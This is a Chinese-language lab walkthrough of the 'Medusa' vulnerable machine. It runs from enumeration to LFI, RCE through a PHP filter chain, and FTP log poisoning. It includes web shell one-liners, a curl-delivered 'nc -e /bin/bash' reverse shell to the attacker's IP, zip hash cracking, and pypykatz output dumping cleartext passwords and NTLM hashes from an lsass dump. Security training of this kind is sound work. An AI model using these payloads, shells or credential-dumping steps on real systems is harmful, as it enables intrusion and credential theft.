信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.200  08:00:27:83:be:4d       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e3:9f:ef       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.082 seconds (122.96 hosts/sec). 4 responded
❯ export ip=192.168.60.200
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.200:22
Open 192.168.60.200:21
Open 192.168.60.200:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 14:16 CST
Initiating ARP Ping Scan at 14:16
Scanning 192.168.60.200 [1 port]
Completed ARP Ping Scan at 14:16, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:16
Completed Parallel DNS resolution of 1 host. at 14:16, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:16
Scanning 192.168.60.200 [3 ports]
Discovered open port 80/tcp on 192.168.60.200
Discovered open port 22/tcp on 192.168.60.200
Discovered open port 21/tcp on 192.168.60.200
Completed SYN Stealth Scan at 14:16, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.60.200
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-02-22 14:16:27 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:83:BE:4D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

扫一下目录，有个/hades目录其他都是apache的默认页面

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.200
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10674]
/manual               (Status: 301) [Size: 317] [--> http://192.168.60.200/manual/]
/hades                (Status: 301) [Size: 316] [--> http://192.168.60.200/hades/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

不过对比了标准的apache的默认页面，发现修改了一点

❯ diff index.html default_index
6c6
<     <title>Apache2 Debian Default Page: It works</title>
---
>     <title>Apache2 Test Debian Default Page: It works</title>
38c38
<     background-color: #555555;
---
>     background-color: #FFFFFF;
95c95
<     background-color: #999999;
---
>     background-color: #FFFFFF;
351c351
<                 rel="nofollow">Kraken</a> open the door.
---
>                 rel="nofollow">existing bug reports</a> before reporting a new bug.
~/hmv                                                                                                                                        14:57:53
❯

得到Kraken关键字

再次扫描，发现有个door.php

❯ gobuster dir -u http://$ip/hades -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.200/hades
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 0]
/door.php             (Status: 200) [Size: 555]
Progress: 568520 / 1038220 (54.76%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 570795 / 1038220 (54.98%)
===============================================================
Finished
===============================================================

访问一下，有个表单，发现最多输入6位

尝试输入上面的Kraken

得到一个域名

编辑一下hosts

Wfuzz

模糊测试一下子域名

得到dev.medusa.hmv

❯ wfuzz -c -u "http://medusa.hmv" -H "HOST:FUZZ.medusa.hmv" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 929
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://medusa.hmv/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000019:   200        25 L     285 W      1973 Ch     "dev - dev"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 804
Filtered Requests: 803
Requests/sec.: 0

添加hosts

curl一下，得到

❯ sudo vim /etc/hosts
❯ curl dev.medusa.hmv
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/styles.css">

    <title>Medusa</title>
</head>
<body>
    <h1 class="h1">The myth of Medusa: the deadly Gorgon</h1>
    <div class="center">
        <img  class="img" width="430px"   src="assets/medusa.jpg"  alt="medusa">
    </div>

        <p class="p">In Greek mythology "medusa" means guardian or protector, and is one of the three gorgons that lived in the underworld. Her main characteristic is that she could turn into stone anyone who was reached by her gaze.
        Medusa, Steno and Euryale, were monsters, gorgons of Greek mythology, who were born from the primordial sea god, Forcis, and Ceto, an aquatic monster. Humans and gods feared them, as the snakes in their hair, their long fangs and claws, complemented a rather frightening appearance.
        The gorgons Steno and Euryale were immortal. Medusa was the only mortal and, at the same time, she was the most beautiful. It is said that her power of petrification was given to her as protection, since she was mortal.
        There are several versions of the gorgon myth... One of them is that she was a monster from birth. Another version of why Medusa went from being a beautiful mortal to being a monster like her sisters is that of Ovid.
        He tells that Medusa was a very beautiful young woman, a priestess in a temple of Athena. She was so beautiful that Poseidon fell in love with her and ended up raping her in the temple.
        This made Athena, the goddess of wisdom, furious, so she decided to turn her into a monster like her sisters. The curse of turning anyone who saw her into stone was a punishment for breaking her vow of celibacy, and for "seducing" Poseidon in his temple.
        在希腊神话中，“美杜莎”意味着守护者或保护者，是生活在地底世界的三个蛇发女妖之一。她的主要特征是，任何被她凝视到的人都会变成石头。
美杜莎、斯特诺和尤里亚勒是希腊神话中的怪物、女妖，他们出生于原始海神福尔西斯和水怪刻托之间。人类和众神都害怕她们，因为她们头发上的毒蛇、长长的獠牙和爪子使得她们看起来非常可怕。
斯特诺和尤里亚勒是不朽的。美杜莎是唯一一个凡人，并且同时也是最美丽的。据说她具有石化能力作为自我保护，因为她本身就是凡人。
关于女妖传说有许多版本...其中之一认为她从出生开始就是一个怪物。另一个版本解释了为什么美杜莎从一个漂亮的凡人变成了像姐妹那样恐怖的怪物，这个版本由欧维德提供。
他讲述了美杜莎曾经是一个非常漂亮年轻女子，在雅典娜庙中担任祭司。 她如此迷人以至于波塞冬爱上了她，并最终在寺庙里强暴了她。
这激怒了智慧女神雅典娜, 所以决定将其变成像姐妹那样恶魔般形象. 将任何看见过自己 的 人 石化 是对打破贞洁誓言 和 在他 的 寺 庙 “ 引诱 ” 波赛顿 的 惩罚 。
        </p>
</body>
</html>

扫一下子域名的目录

❯ gobuster dir -u http://dev.medusa.hmv -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.medusa.hmv
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1973]
/files                (Status: 301) [Size: 316] [--> http://dev.medusa.hmv/files/]
/assets               (Status: 301) [Size: 317] [--> http://dev.medusa.hmv/assets/]
/css                  (Status: 301) [Size: 314] [--> http://dev.medusa.hmv/css/]
/manual               (Status: 301) [Size: 317] [--> http://dev.medusa.hmv/manual/]
/robots.txt           (Status: 200) [Size: 489]
Progress: 947819 / 1038220 (91.29%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 948910 / 1038220 (91.40%)
===============================================================
Finished
===============================================================

得到一个robots.txt，哈哈是个美杜莎的颜文字

❯ curl http://dev.medusa.hmv/robots.txt
                   ,--.
          ,--.  .--,`) )  .--,
       .--,`) \( (` /,--./ (`
      ( ( ,--.  ) )\ /`) ).--,-.
       ;.__`) )/ /) ) ( (( (`_) )
      ( (  / /( (.' "-.) )) )__.'-,
     _,--.( ( /`         `,/ ,--,) )
    ( (``) \,` ==.    .==  \( (`,-;
     ;-,( (_) ~6~ \  / ~6~ (_) )_) )
    ( (_ \_ (      )(      )__/___.'
    '.__,-,\ \     ''     /\ ,-.
       ( (_/ /\    __    /\ \_) )
        '._.'  \  \__/  /  '._.'
            .--`\      /`--.
                 '----'

再次扫描一下files的目录

❯ gobuster dir -u http://dev.medusa.hmv/files -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.medusa.hmv/files
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 0]
/system.php           (Status: 200) [Size: 0]
/readme.txt           (Status: 200) [Size: 144]

又有一个提示

❯ curl http://dev.medusa.hmv/files/readme.txt
-----------------------------------------------
+  Don't trust your eyes, trust your instinct +
-----------------------------------------------

还有一个system.php

LFI本地文件包含

猜测可能含有LFI，得到参数view

❯ wfuzz -c -u "http://dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 --hc 404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd
Total requests: 26584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000245:   200        27 L     40 W       1452 Ch     "view"
000007399:   200        0 L      0 W        0 Ch        "members-area"

Total time: 0
Processed Requests: 7397
Filtered Requests: 7396
Requests/sec.: 0

拿到用户spectre

❯ curl http://dev.medusa.hmv/files/system.php\?view\=/etc/passwd |grep /bin/bahs
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1452  100  1452    0     0   683k      0 --:--:-- --:--:-- --:--:-- 1417k
❯ curl http://dev.medusa.hmv/files/system.php\?view\=/etc/passwd |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1452  100  1452    0     0   599k      0 --:--:-- --:--:-- --:--:--  708k
root:x:0:0:root:/root:/bin/bash
spectre:x:1000:1000:spectre,,,:/home/spectre:/bin/bash

之前还看到有开放21端口，尝试爆破ftp，无果后

回到这个LFI漏洞尝试利用php过滤器来读取用户私钥文件无果

LFI2Rce

文件包含/路径遍历 - HackTricks — File Inclusion/Path traversal - HackTricks

LFI2RCE 通过 PHP 过滤器 - HackTricks — LFI2RCE via PHP Filters - HackTricks

synacktiv/php_filter_chain_generator

可以通过滥用 PHP 过滤器生成任意内容作为输出，这就意味着你可以生成任意的php代码并且执行

利用脚本生成一个<?php phpinfo(); ?>

❯ python3 php_filter_chain_generator.py -help
usage: php_filter_chain_generator.py [-h] [--chain CHAIN]
                                     [--rawbase64 RAWBASE64]
php_filter_chain_generator.py: error: argument -h/--help: ignored explicit argument 'elp'
❯ python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
[+] The following gadget chain will generate the following code : <?php phpinfo(); ?> (base64 value: PD9waHAgcGhwaW5mbygpOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

访问后果然注入了phpinfo的代码

看一下有没有ban掉一些functions功能

既然没有尝试写个一句话木马<?=`$_GET[0]`?>

直接弹个shell过来

❯ python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]`?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]`?> (base64 value: PD89YCRfR0VUWzBdYD8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

到这还有另一种解法通过vsftp.log日志进行rce

上面开放的21端口

利用log写入一句话木马，再LFI读取log执行命令

文件包含/路径遍历 - HackTricks — File Inclusion/Path traversal - HackTricks

❯ ftp $ip
Connected to 192.168.60.200.
220 (vsFTPd 3.0.3)
Name (192.168.60.200:Pepster): <?php system($_GET['cmd']);?>
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.

正常弹shell即可，注意如果是curl的话要进行url编码

1	❯ curl "http://dev.medusa.hmv/files/system.php/?view=/var/log/vsftpd.log&cmd=nc%20-e%20/bin/bash%20192.168.60.100%204444"

用户提权

监听一下端口

❯ pwncat-cs -lp 4444
[16:46:20] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[16:47:02] received connection from 192.168.60.200:57922                                                                                    bind.py:84
[16:47:22] 192.168.60.200:57922: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@medusa:/var/www/dev/files$

传个linpeas上去扫一下

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/.../old_files.zip
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/log/vsftpd.log
/var/tmp

得知/.../old_files.zip 下载到本地解压一下

发现需要密码，john爆破

❯ x old_files.zip
extract: extracting to old_files
Archive:  /home/Pepster/hmv/old_files.zip
   skipping: lsass.DMP               need PK compat. v5.1 (can do v4.6)
❯ zip2john old_files.zip >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 12386830 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
medusa666        (old_files.zip/lsass.DMP)
1g 0:00:00:49 DONE (2025-02-22 17:02) 0.02040g/s 115523p/s 115523c/s 115523C/s megan0308..medabe15
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ 7z x old_files.zip

7-Zip 24.08 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-08-11
 64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 12387024 bytes (12 MiB)

Extracting archive: old_files.zip
--
Path = old_files.zip
Type = zip
Physical Size = 12387024


Would you like to replace the existing file:
  Path:     ./lsass.DMP
  Size:     34804383 bytes (34 MiB)
  Modified: 2023-01-17 22:12:41
with the file from archive:
  Path:     lsass.DMP
  Size:     34804383 bytes (34 MiB)
  Modified: 2023-01-17 22:12:41
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y


Enter password (will not be echoed):
Everything is Ok

Size:       34804383
Compressed: 12387024

拿到一个dump文件，但这个文件咋打开啊？

看了下文件信息是小型的奔溃报告

1
2
3

❯ file lsass.DMP
lsass.DMP: Mini DuMP crash report, 12 streams, Tue Jan 17 14:08:32 2023, 0x1826 type

MiniDump文件：它们通常包含堆栈跟踪、内存快照、线程信息和其他诊断数据，以帮助开发人员查找和修复崩溃的原因。

12个流：这个文件包含了12个流，每个流可能包含不同类型的数据，如线程、模块、异常、堆栈等。

时间戳：文件的时间戳是2023年1月17日14:08:32，这表示文件生成的时间。

类型：0x1826表示文件的特定类型或版本。

哈哈哈，有点像取证了🤣

skelsec/pypykatz: Mimikatz implementation in pure Python

通过Github上的一个项目，由纯python实现的mimikatz，从而可以提取dump中的信息

利用pip直接安装一下

❯ pip3 install pypykatz
❯ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 2261421 (2281ad)
session_id 18
username avijneyam
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:05:20.008398+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1016
luid 2261421
 == MSV ==
     Username: avijneyam
     Domain: Medusa-PC
     LM: 009c022933c34479477921681300160c
     NT: af71862c10235568287670ca23484fe5
     SHA1: 3c9943f1b81e5cdab6cd00d694f8ddd19a079893
     DPAPI: NA
 == WDIGEST [2281ad]==
     username avijneyam
     domainname Medusa-PC
     password 4v1jn3y4m_zxc
     password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
 == Kerberos ==
     Username: avijneyam
     Domain: Medusa-PC
     Password: 4v1jn3y4m_zxc
     password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
 == WDIGEST [2281ad]==
     username avijneyam
     domainname Medusa-PC
     password 4v1jn3y4m_zxc
     password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
 == TSPKG [2281ad]==
     username avijneyam
     domainname Medusa-PC
     password 4v1jn3y4m_zxc
     password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000

== LogonSession ==
authentication_id 2167111 (211147)
session_id 17
username shelldredd
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:04:31.112890+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1009
luid 2167111
 == MSV ==
     Username: shelldredd
     Domain: Medusa-PC
     LM: eed81a9f101536a4abb659e51581b7d4
     NT: 4a88b7b647b8832ddd0660ec101c7471
     SHA1: e2b9a8a7a676bad2060ee2b57cd497ae11d599f9
     DPAPI: NA
 == WDIGEST [211147]==
     username shelldredd
     domainname Medusa-PC
     password t0p_s3cr3t
     password (hex)7400300070005f0073003300630072003300740000000000
 == Kerberos ==
     Username: shelldredd
     Domain: Medusa-PC
     Password: t0p_s3cr3t
     password (hex)7400300070005f0073003300630072003300740000000000
 == WDIGEST [211147]==
     username shelldredd
     domainname Medusa-PC
     password t0p_s3cr3t
     password (hex)7400300070005f0073003300630072003300740000000000
 == TSPKG [211147]==
     username shelldredd
     domainname Medusa-PC
     password t0p_s3cr3t
     password (hex)7400300070005f0073003300630072003300740000000000

== LogonSession ==
authentication_id 2072766 (1fa0be)
session_id 16
username powerful
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:04:05.978125+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1012
luid 2072766
 == MSV ==
     Username: powerful
     Domain: Medusa-PC
     LM: 8657a86693ce10c313cb02d141696a00
     NT: 9b05a607cfb0b59176092be732b6b814
     SHA1: f2197be95bf11a3dc2f494b1a20814a3a27bd420
     DPAPI: NA
 == WDIGEST [1fa0be]==
     username powerful
     domainname Medusa-PC
     password p0w3rf1ll_abc
     password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
 == Kerberos ==
     Username: powerful
     Domain: Medusa-PC
     Password: p0w3rf1ll_abc
     password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
 == WDIGEST [1fa0be]==
     username powerful
     domainname Medusa-PC
     password p0w3rf1ll_abc
     password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
 == TSPKG [1fa0be]==
     username powerful
